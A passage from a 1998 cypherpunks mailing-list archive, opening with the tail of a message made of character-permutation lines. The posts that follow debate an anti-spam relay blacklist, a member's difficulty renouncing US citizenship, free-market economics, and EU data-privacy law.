'-+,"(..)0*"%$&/,&-#()#%/ #/-,%#"-(%+(,.'")&&!$00+.$!*/)*'%,#)"-,(+"./(#).0'*0
-!&*'+$%!&/$ -+"0+%0#*(#-'*)&!'."$.%//!(,&$,)*%/$0#&-#*)&-0$+(,!/%"+("'.!,)'. 
%.,!#,/(0%!*)".+$/-$*&(-&#+0')"'"'%,,..)-"$%(+/(+*0&'!)0!/&#*$#- ."#0).%)'+0$,
("%+-*&$'/,&!!/-*(#(#,"%/"(*%-+/)#.!0'-+*.!0$$&&'), [SKC;3+#]UME=5-%_WOG?7/'aY
QIA91)ZRJB:2*"\TLD<4,$^VNF>6.&`XPH@80( I)Q1Y9aAH(P0X8`@G'O/W7_?F&N.V6^>E%M-U5]
=D$L,T4\<C#K+S3[;B"J*R2Z: ZRJB:2*"[SKC;3+#\TLD<4,$]UME`XPH@80(_WOG?7/'^VNF>6.&
=5-% /2,9"&$=0'6+84-%;)1(<5.#JU@FPX?ITNBQMRHYCVOKSE>A A"#$%&%&'()*)*+,-.-./012
12345656789:9:;<=>=>?@A" 1(56>-=2"08;&3@+#)9/A<$*4.?'7,%:

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <sysadmin@mfn.org>
Date: Tue, 20 Oct 1998 11:23:22 +0800
To: "'cypherpunks@toad.com>
Subject: Re: Dorkslayers..
Message-ID: <01BDFBA8.6C12F0A0@noc.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain





We had a run-in with Dorkslayers last night too :(

The first time we brought out our sendmail update, 
we left it in it's "Virgin state" for approximately
6 hours for monitoring.  During that period we "failed"
a "relay test", and were blacklisted.  As an RBL subscriber,
I was appalled at the difference in attitudes between vix
and dorkslayers.  It is obvious after just a momentary look 
at the web site that they are out to "have some fun" 
antagonizing others.  

The RBL will mail a notice.  These slimebags don't even
care if you have had an illegal relay: all they care about 
is finding an  *excuse*  to put you on their list.  Why is
a group "dedicated to saving the InterNet" giving it's biggest 
prominence (in terms of W3 space) to hate mail recieved from
people that D/S has intentionally wronged?

This group is actually *hurting* the cause significantly.  I 
was furious enough that I almost left the anti-relay out just
to piss them off.  The problem is, *that's what they really want*.

Getting off is easy, just configure your networks they way *THEY*
want them configured: your clients/customers/employees can all
go to hell as far as Dorkslayers is concerned. VERY POOR.

Perhaps a torrent of mail asking *THEM* to clean up their
act would be a "push in the right direction"?

J.A. Terranson
sysadmin@mfn.org
(Who will not doubt be back on their list by tomorrow
for daring to bad mouth the all-mighty "Dorkslayers")




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 11:03:34 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: My citizenship renunciation made difficult (fwd)
Message-ID: <199810200247.VAA08359@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 19 Oct 1998 22:17:12 -0400 (AST)
> From: Vincent Cate <vince@offshore.com.ai>
> Subject: My citizenship renunciation made difficult 

> But most of all, the very idea that the US government has to give me
> permission to renounce my association with it seems totally wrong.  The
> people in the US are supposed to be free, not slaves or subjects.  Free
> means free to leave. 
> 
> Any advice?

Sue.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 20 Oct 1998 10:37:19 +0800
To: cypherpunks@cyberpass.net
Subject: My citizenship renunciation made difficult
Message-ID: <Pine.LNX.3.95.981019212457.20660C-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain




My Barbados Embassy/Consulate contact Steve Steger (246) 228 4338 called
me up and told me that the state department has not approved my
renunciation - they say one of the forms the Barbados guys had me fill out
is old.

For those just tuning in, I renounced my citizenship to be free of US laws
on cryptography.

While I was at the Consulate they had me fill out a 1st set of forms, then
said those were obsolete (a few years back) and after waiting around for
hours they had me fill out a 2nd set of forms that they said was the
current version.  I filled out and signed everything they gave me.  They
then had an interview with several witnesses.  They took my US passport
and gave me copies of the 2nd version of all the forms with my signatures
and theirs on them. 

Now Steve says that I am supposed to travel down to Barbados again using
up my time and my money because of their error to do a 3rd version of
their forms. Both the time and the money make this a hardship.  They won't
mail me this 3rd version of the forms and they won't pay for my trip (let
alone time). 

It seems to me that since I told the New York times that I renounced my US
citizenship, and they told the world, that it should be a done deal. Also,
spending a day in the Consulate signing everything they gave me should be
enough to do it.  And why is a form saying basically "I renounce my
citizenship" that worked awhile back not effective today?

But most of all, the very idea that the US government has to give me
permission to renounce my association with it seems totally wrong.  The
people in the US are supposed to be free, not slaves or subjects.  Free
means free to leave. 

Any advice?

   -- Vince

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Vincent Cate                           Offshore Information Services
 Vince@Offshore.com.ai                  http://www.offshore.com.ai/
 Anguilla, BWI                          http://www.offshore.com.ai/vince
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

You have to take life as it happens, but you should try to make it
happen the way you want to take it.    - German Proverb






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 20 Oct 1998 14:12:43 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: My citizenship renunciation made difficult
In-Reply-To: <Pine.LNX.3.95.981019212457.20660C-100000@online.offshore.com.ai>
Message-ID: <000701bdfbec$a511c220$588195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



>From Vince Cate:

: But most of all, the very idea that the US government has to give me
: permission to renounce my association with it seems totally
: wrong.  The people in the US are supposed to be free, not slaves or
: subjects.  Free means free to leave.
.......................................................


That was a long time ago, Vince.   People don't think that way any more.   Government
clerks have taken over the world.   No one is their own person any more; we belong to the
National Identity.   But anything which goes wrong is totally your fault.  You should have
known those forms were obsolete.   Do they have to tell you everything?  (do they have to
tell you *anything*?)

I would advise them that if they want more information from you, to come and get it.   I
would advise them to copy the information from the old form.  I would advise them to call
you on the phone and inquire over any missing information to satisfy their need for it.  I
would advise your new leaders in Mozambique to harrass the US clerks and threaten them
with something.  I would advise the New York Times about this bit of inanity.   I would
ask the clerks what they're going to do about it if you don't fill out a new form (take a
boat trip over and dock you?)   I would ask the Mozambique govmt whether they care, and if
they would cooperate with the US if it staked a claim on your body (and your tax
contributions).   I would post this somewhere on the internet where many people would read
it and talk about it, not only to let them know how things work, but also to  alert
cyberspace about yet another flaw in government operations and in the US legal atmosphere.

All very useful ideas.   : |

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 13:07:41 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810200440.XAA08804@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

I've a point unrelated to this topic. I recieved two copies of your email.
One was 101 lines and the other was 108 lines, the difference being 7 blank
lines. Pretty curious, no?

Forwarded message:

> Date: Mon, 19 Oct 1998 15:15:13 -0400
> From: tzeruch@ceddec.com
> Subject: Re: Another potential flaw in current economic theory...

> Not labor any more than capital.  I think what you refer to is often
> called "stakeholders" which includes suppliers and customers in addition
> to employees. 

Well suppliers are a business unto themselves so I'm not sure I can extend
my point that far. I certainly wouldn't include customers as this confuses
the entire issue of the point of business (ie making a profit). If we extend
the issue to include customers then we're looking at reducing our profit
margin to zero as we discount our services to the customer over time. There
is also the aspect that with this model we end up selling our service to
ourselves, an inherently loosing proposition since there is no profit to be
made at all in that case.

> However you do not need to play games to justify proper treatment of
> employees.

I didn't mean to imply any sort of mistreatment, though I did raise that
spectre in related postings. Sorry for the confusion. The point I was trying
to make was that business has a third, and untried near as I can tell,
strategy in approaching their business process. Include the employees in the
plan with the specific goal of making them rich enough and invested enough
so they don't have to work and do it in a short time span - say 10 years.
I've read a few pieces (I must admit to viewing them as pie-in-the-sky) which
predict that what will happen with technology is that people will begin to
invest in automated processes and over time as these become ubiquitous people
don't work, they live off their profit from the investment in these automated
factories. One aspect, which I alluded to above, is that at some point the
investors are also their own customers so that the profit they make to buy
the materials is in a closed loop. This seems to me to invite a level of
inflation (in order to preserve at least the ghost of a profit) that would
explode pretty quickly.

> If you consider capital such as a machine, it is usually
> better to keep it well maintained and in good repair instead of letting it
> wear out and rust - the quality of your goods will suffer, profits will go
> down, and shareholders will dump management.

True enough, though the machines don't retire (they do wear out). If we look
at it from a strictly cost analysis perspective I'd agree with you (as I
understand your point) fully. The question I have is what if we abandon the
Friedman view and take on a more humanistic view. In short, business
represent a participant in a social process. As a result they have more
duties than just making profit for their shareholders (or stakeholders).

[text deleted]

> Our current stock market bubble - which is in the process of popping -
> distorted this.

I agree in part, I believe that the reason we're seeing the failure of the
traditional economic systems is that in large scales with extremely fluid
capital (intellectual, physical, monetary, etc.) it becomes very difficult
to keep long term participants when there are so many more lucrative
short-term potentials. I personaly feel the collapse of the CCCP in the early
90's is a good indication of this 'delayed responce' syndrome. I also believe
the current problem with funding the government is another example where the
gains are such that the traditional political and social views don't apply
well enough so that the errors cancel each other out. Instead they pile on
top of each other over time. My guess is that the current political system
will collapse of its own ineptitude and lethargy as well as a wedding to
outmoded ideas sometime in the next 20 years or so. What comes after, I
believe at this point, will be a polycratic technocracy based on distributed
democratic ideals.

>  My concept of Usury (yes, another mideval or earlier
> idea) is loaning in the abstract.  You just want 5% or 10%, and try to
> find a piece of paper (or electronic book entry) that will return it
> regardless of what is behind the paper.  This can include ponzi schemes if
> they aren't recognized as such.

Oops, what's a 'ponzi scheme'? I can't find it in any of my texts....

> If people were really investing in the non-usurous sense, they would be
> concerned with the company as an organic whole, with the suppliers, and
> customers, and employees, and the physical plant and everything else,

I understand the conept of 'organic whole'. I have to disagree at extending
it to include the customers and suppliers for the reasons listed above. In a
very real sense the term you use is more apt than anything I've come up
with so far as a label.

> If I want milk, I will be very concerned with keeping the cow happy and
> healthy, and doing so rationally - pampering the cow too much won't give
> any more milk and maybe make the cow less healthy, but starving it or
> beating it would be worse.

I agree, the interesting question - I hope without stretching the comparison
too far - is what happens when the farmer figures out how to make the milk
using a bacteria (for example) via genetic manipulation? (this is meant as
an example of technical invasion of a traditional market) Does the farmer
continue to feed the cow on principle (it being a fellow living creature and
mankind having destroyed its natural habitats and hence we can't turn it
loose) or simply kill the beast and sell the remains to the golden arches?

> price didn't go up further).  I haven't heard a reason connected with
> something tangible (dividends, book-value, cash flow) for someone to own
> such a stock.  Only that "it the internet".  And I think this decoupling
> is at the center of what you are getting at.  Paper v.s. people, and when
> it comes time to decide, the paper wins.

That is most definitely a major aspect of the problem. People get so dazzled
by the visions of fruit plums dancing before their eyes they don't notice
the snow has melted.

> There is a lot of ignorance, and it is rational in the short term - these
> stocks are going up, so it would otherwise make sense to follow the trend.
> But if the trend is all that is being watched, who is going to care if
> they are using slave-labor? - to mention just one issue.

I'm afraid I don't quite catch your point here. Could you reword it?

> But that is investing in a bubble.

Exactly why I don't want to see an integrated world economy. It's doomed to
fail from the get go.

>  The same thing happened in 1720 with
> the South Seas company in Great Britian and the Mississippi Scheme in
> France.

I'll look into these as I'm not familiar with the particular. Thanks for the
lead.

> And I think we will see the same thing here and across the globe shortly.
> Japan started to see this in the early '90s.

Agreed. What I find really funny (in a macabre sort of sense I admit) is
that the folks who are hording gold and other supposed universal valuables
are in for a big surprise at what comes out of the other end. This is going
to be a economic/political Industrial Revolution the likes of which haven't
been seen since mankind invented the little clay balls for sealing contracts
for selling sheep and such.

    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 13:19:46 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another question about free-markets... (fwd)
Message-ID: <199810200457.XAA08867@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 19 Oct 1998 15:53:45 -0400
> From: tzeruch@ceddec.com
> Subject: Re: Another question about free-markets... (fwd)

> Most of these are due to regulation.

No, they are due to a basic human trait - greed. The problem isn't a
economic one it's a people one.

  If you assume the Secret Service
> will bear the cost of enforcing anti-cloning laws, you will not spend the
> money to make your phones unclonable even if the technology exists.

Assuming of course you trust the Secret Service fully and they happen to be
honest to a fault.

> Excessive rate levels are a misnomer.  The only way you can succeed in
> charging above market prices is if there is a law to bar entry.

But that is the exact point in regards cell cloning for example. The final
cost to the purchaser of the clone is *less* than the normal market price.
In a free-market economy the obviously rational thing to do is clone, the
really bad thing is there is nobody short of Guido and his buds to help
the original maker recover those costs or prevent recurrences.

> sub-standard construction is also a misnomer - if you paid for standard X,
> you simply don't pay until the construction is up to that standard.

You've got a circular reasoning here. If we're still talking about a free
market there is no 3rd party to define standards and such to measure
against. There won't even be groups that will be able to review the various
products and compare them in an open market (review the current database
licenses in regards to doing public comparisons).

> Hardly.  If you are saying consumers are stupid, you are probably right,

No, I'm saying there is a considerable sector of the human population that
is dishonest. This won't change based on economic models.

> And you assume that men are islands and don't talk or communicate. 

Actualy I don't. My point is that such assumptions about instant
communications (as required by current economic models) is irrelevant. I
covered that aspect at one point. The fact that people communicate won't
change their base bahaviour characteristics one whit, those are a function
of long-term species survival strategies. People are social animals, the
maximum strategy in social animals is the Prisoners Delima, you play along
most of the time and cheat occassionaly. Over time this strategy will
accumulate more resources than either a pure cheating or honest strategy.
It's this transient aspect that is completely ignored by current economic
though, they recognize only the two extremes.

> Imagine two restaraunts.  If people get food poisoning every week or so at
> one, people will learn not to go there, and it will fold as people go to
> the second.

This example really doesn't fit my theory since it isn't possible for a
single (or even two) restaraunts to saturate a market. I suspect that food,
is entirely too tied to the vagaries of transient taste to behave this way.

What is more likely to happen is that as people go back and forth between
the two restaraunts from day to day (assume that one of them is dealing bad
food) both will go down. Remember there isn't a health inspector or somebody
to come and test the food, only the experiential evidence of the eaters. Now
since it takes as much as 24+ hours for symptoms to develop it is entirely
possible for a person to eat at one restaraunt on Monday at luch and get
food poisoning and it not show up until the next afternoon, *after* they've
already eaten at the second restaraunt. At that point the person is sick and
isn't going to want to go back to either.

Better safe than sorry.

> Reputation (economists include it in the term "good will")
> does have an economic benefit.

Only in certain kinds of markets. I don't believe free markets are one of
them.

> You simply may not like human psychology, but that does not make the free
> market any less just.

I'm not sure how to respond to this. Let me put it to you this way...

How do you propose a free market to operate if there aren't people (and as a
conequence their psychology) involved?

> The market enforces a foolishness tax which no government can repeal.

Again, only in certain situations - a free-market is not one of them.

You might want to look at some of the recent studies done (I was looking at
an article the other day at the bookstore but can't remember the article -
sorry) that demonstrate pretty conclusively that mediocre strategies pay off
over time nearly as well as optimal ones do.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 13:13:23 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Cell phone cloning and economics...
Message-ID: <199810200501.AAA08929@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

Another point in regards the market behaviour regarding cell phones....

In a free-market there is no reason to believe that phone cloning would be
reduced as it would still provide a distinct economic advantage over those
who sell 1st line equipment.

The only thing that keeps the 1st line companies in business is the
regulation, without it they can't afford to do the basic research or
infrastrucure construction since they can't sell enough phones in the first
place because the clones have bought up their share. So without some sort of
3rd party regulation there is nothing inherent in a free-market that
protects that initial intellectual and econimic investment so that it can
grow and produce a market and a profit.

Now it is clear that this regulation is *NOT* primarily the government but
rather the social institution or society the governemt or regulatory body
exists within. Remember, the profit goes to the one who occassionaly breaks
the social taboo's.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 13:32:46 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Human psychology & free-markets: a fundamental question
Message-ID: <199810200509.AAA09007@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Why do people behave more ethicaly (or fairly) in a free-market than in a
regulated market?

It's clear the pay-off for defection is more in a free-market because the
actual opportunities come more often. The market regulation simply makes it
more costly to defect, and hence reducing the final profit motive, because
it takes more resources to bypass the regulation hence increasing the price
of defection and increasing the period between defections because it takes
more time to collect and manage the resources to defect.

I would contend that the economic problems we experience are not because the
market is regulated (or not) but that the regulation is not *impartial* to
the outcome.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John Cypherpunk" <jcypherpunk@hotmail.com>
Date: Tue, 20 Oct 1998 16:21:16 +0800
To: vince@offshore.ai
Subject: RE: My citizenship renunciation made difficult
Message-ID: <19981020075442.8827.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



>From Vince Cate:

: But most of all, the very idea that the US government has to give me
: permission to renounce my association with it seems totally
: wrong.  The people in the US are supposed to be free, not slaves or
: subjects.  Free means free to leave.
........................................................

Did you use the right forms to establish your citizenship?
Suggest the nice embassy people attend your offices to prove you
are a US citizen.

______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Tue, 20 Oct 1998 17:22:54 +0800
To: cypherpunks@Algebra.COM
Subject: "We have to destroy privacy in order to protect privacy"
In-Reply-To: <19981019195132.27759.rocketmail@send1e.yahoomail.com>
Message-ID: <v03130323b251fb30bb8f@[209.66.100.146]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:39 AM -0700 10/20/98, Theodor.SCHLICKMANN@BXL.DG13.cec.be wrote:
>Those who are affected in the first place are US companies who
>are used to collect and process personal data from their customers
>without any embarrassment. They will be excluded from
>the European market, if they do not follow European Data
>Protection rules.

Sounds good to me...a trade war with the Communist Confederation of Europe.

>Until now the US goverment has decided to leave this matter
>to self regulation. However, US industry did not manage to
>come up with an appropriate codex.

Because in these United States we have certain constitutional rights. Some
of those rights include the First and the Fourth Amendments. Taken together
with other rights, the conclusion is this:

The government cannot insist on the form of data stored in data bases.

(There have been unconstitutional, in the opinion of many, encroachments on
this right, and especially of what businesses and others may do with data.
Releasing or selling video rental records, for example.)

To be more concrete, if I compile lists of who is writing articles on
Usenet, I have no obligation to either purge these records or show them to
others or not sell them or _anything_. The government cannot get at my
records except under limited situations.

Europe's "data privacy laws," which I have been critical of for more than
ten years now, are an abomination. While the laws sound well-intentioned,
they effectively give the state the power to sift through filing cabinets
and disk drives looking for violations.

And the laws create much mischief. A node for the Cypherpunks distributed
list probably could not legally be run in many European states (maybe none
of the EEC states now that they are conforming to the same laws). Why not?
Check the provisions on compiling lists and the need for permission from
the compilee, and the need to register the lists with various bureaucrats.

(This example came up several years ago in connection with the U.K.'s data
privacy laws. As the law read, lists of e-mail addresses fell under the
reporting requirements, as did data bases of customers, vendors, and other
such stuff a company might collect.)

Of course, like all bad laws, these laws are only enforced at the
convenience of the state. While Germany may not hassle the Cypherpunks list
operators in Berlin, they may very well use the data privacy laws to force
the Church of Scientology to open up their lists of members, to register
the lists, to purge the lists, etc.

And France will probably use the laws to harass Greenpeace.

Bad laws. Bad to invade file cabinets.



>If industry
>does not comply until the end of the year, FTC promised that
>they will introduce a bill at congress which will comply with
>European data protection standards. On the other hand, the US did
>not even manage to adopt the Guidelines on the Protection
>of Privacy and Transborder Flow of Personal Data by OECD.

Because fucking OECD deals don't take precedence over our Constitution.


>Other countries, in particular those in Eastern and Central
>Europe have, in spite of massive lobbying by D. Aaron, adopted
>laws on data protection and privacy since they do not want
>endanger their future participation in the EU.

These laws on "data protection and privacy" are in many ways laws _against_
privacy. After all, if data are actually private, the authorties won't see
any violations.

"We have to destroy privacy in order to protect privacy."

Let the war with the statists in Europe commence.

--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 20 Oct 1998 18:49:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: An Appraisal of the Technologies of Political Control
In-Reply-To: <WIN937-981020081831-2924*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
Message-ID: <199810201019.GAA04985@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Theodor Schlickmann offered:

>http://www.europarl.eu.int/dg4/stoa/en/publi/166499/execsum.htm

This is a shortened version of an ATPC update over twice as long.

The full report was offered for a while by the Dutch newspaper
NRC Handelsblad but has since been replaced by the shorter
version. Why only the short version is being offered is not 
clear -- it addresses only the surveillance part of the full
report, ECHELON and the FBI/EU wiretapping deal. 

The report is controversial within EuroParl and the European
Commission and there may have  been a political decision
to focus on its most contentious aspects. 

Other sections update the full range of technologies for political 
control of the original report published in January 1998. (Note 
that EuroParl has still not made the orginal report available
online.)

The NRC Handelsblad reporter who got the full report from the 
author, the Omega Foundation, sent us a copy available at:

   http://jya.com/stoa-atpc-so.htm  (101K)

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 20 Oct 1998 20:42:58 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Another potential flaw in current economic theory... (fwd)
Message-ID: <199810201221.HAA09849@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 20 Oct 1998 09:17:50 +0100
> From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
> Subject: Re: Another potential flaw in current economic theory...

> I see there are lots of interesting discussions on economy recently
> on this list. But I miss stuffs relating to the currently existing
> crisis of the financial market, topics like causes of failure of 
> LTCM etc. etc.

All I've been discussing is a handful of thought on free-market economies
and human psychology. Haven't really touched the actual market issues
directly.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Tue, 20 Oct 1998 16:01:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Another potential flaw in current economic theory...
In-Reply-To: <98Oct19.235259edt.42154@brickwall.ceddec.com>
Message-ID: <362C472E.60F73A1F@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



tzeruch@ceddec.com wrote:
> 
> On Tue, 6 Oct 1998, Jim Choate wrote:
> 
> > It occurs to me that there is another potential flaw in current economic
> > theory and business practice.

I see there are lots of interesting discussions on economy recently
on this list. But I miss stuffs relating to the currently existing
crisis of the financial market, topics like causes of failure of 
LTCM etc. etc.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 20 Oct 1998 21:57:42 +0800
To: Vincent Cate <cypherpunks@cyberpass.net
Subject: Re: My citizenship renunciation made difficult
In-Reply-To: <Pine.LNX.3.95.981019212457.20660C-100000@online.offshore.com.ai>
Message-ID: <19981020091947.A29973@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



	I believe that the UN Universal Declaration of Human rights
includes the right to emmigrate without undue hardship.  I would
suggest contacting Amnesty International to complain about this
harrassment by the US government.

	Article 13, section 2, article 15, section 2.

http://www.un.org/Overview/rights.html

On Mon, Oct 19, 1998 at 10:17:12PM -0400, Vincent Cate wrote:
| 
| My Barbados Embassy/Consulate contact Steve Steger (246) 228 4338 called
| me up and told me that the state department has not approved my
| renunciation - they say one of the forms the Barbados guys had me fill out
| is old.
| 
| For those just tuning in, I renounced my citizenship to be free of US laws
| on cryptography.
| 
| While I was at the Consulate they had me fill out a 1st set of forms, then
| said those were obsolete (a few years back) and after waiting around for
| hours they had me fill out a 2nd set of forms that they said was the
| current version.  I filled out and signed everything they gave me.  They
| then had an interview with several witnesses.  They took my US passport
| and gave me copies of the 2nd version of all the forms with my signatures
| and theirs on them. 
| 
| Now Steve says that I am supposed to travel down to Barbados again using
| up my time and my money because of their error to do a 3rd version of
| their forms. Both the time and the money make this a hardship.  They won't
| mail me this 3rd version of the forms and they won't pay for my trip (let
| alone time). 
| 
| It seems to me that since I told the New York times that I renounced my US
| citizenship, and they told the world, that it should be a done deal. Also,
| spending a day in the Consulate signing everything they gave me should be
| enough to do it.  And why is a form saying basically "I renounce my
| citizenship" that worked awhile back not effective today?
| 
| But most of all, the very idea that the US government has to give me
| permission to renounce my association with it seems totally wrong.  The
| people in the US are supposed to be free, not slaves or subjects.  Free
| means free to leave. 
| 
| Any advice?
| 
|    -- Vince
| 
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|  Vincent Cate                           Offshore Information Services
|  Vince@Offshore.com.ai                  http://www.offshore.com.ai/
|  Anguilla, BWI                          http://www.offshore.com.ai/vince
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| 
| You have to take life as it happens, but you should try to make it
| happen the way you want to take it.    - German Proverb
| 
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Wed, 21 Oct 1998 00:20:04 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: My citizenship renunciation made difficult
In-Reply-To: <19981020091947.A29973@weathership.homeport.org>
Message-ID: <Pine.SOL.3.91.981020093309.27933A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 20 Oct 1998, Adam Shostack wrote:

> Date: Tue, 20 Oct 1998 09:19:47 -0400
> From: Adam Shostack <adam@homeport.org>
> To: Vincent Cate <vince@offshore.com.ai>, cypherpunks@cyberpass.net
> Subject: Re: My citizenship renunciation made difficult
> 
> 	I believe that the UN Universal Declaration of Human rights
> includes the right to emmigrate without undue hardship.  I would
> suggest contacting Amnesty International to complain about this
> harrassment by the US government.
> 
> 	Article 13, section 2, article 15, section 2.
> 
> http://www.un.org/Overview/rights.html
> 
My experience is that the US refers to the UN treaty when it
wants to expand its powers over us.  When it comes to 
protecting our rights, they probably blithefully ignore it.

Try applying many of those human rights protections to
the ChiComs and see what happens.

jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor.SCHLICKMANN@BXL.DG13.cec.be
Date: Tue, 20 Oct 1998 16:21:19 +0800
To: <cypherpunks@Algebra.COM>
Subject: Re: EU Privacy Directive
In-Reply-To: <19981019195132.27759.rocketmail@send1e.yahoomail.com>
Message-ID: <WIN937-981020073817-1F9F*/G=Theodor/S=SCHLICKMANN/OU=BXL/O=DG13/PRMD=CEC/ADMD=RTT/C=BE/@MHS>
MIME-Version: 1.0
Content-Type: text/plain



Those who are affected in the first place are US companies who
are used to collect and process personal data from their customers
without any embarrassment. They will be excluded from
the European market, if they do not follow European Data
Protection rules. 

Until now the US goverment has decided to leave this matter 
to self regulation. However, US industry did not manage to 
come up with an appropriate codex. If industry
does not comply until the end of the year, FTC promised that
they will introduce a bill at congress which will comply with
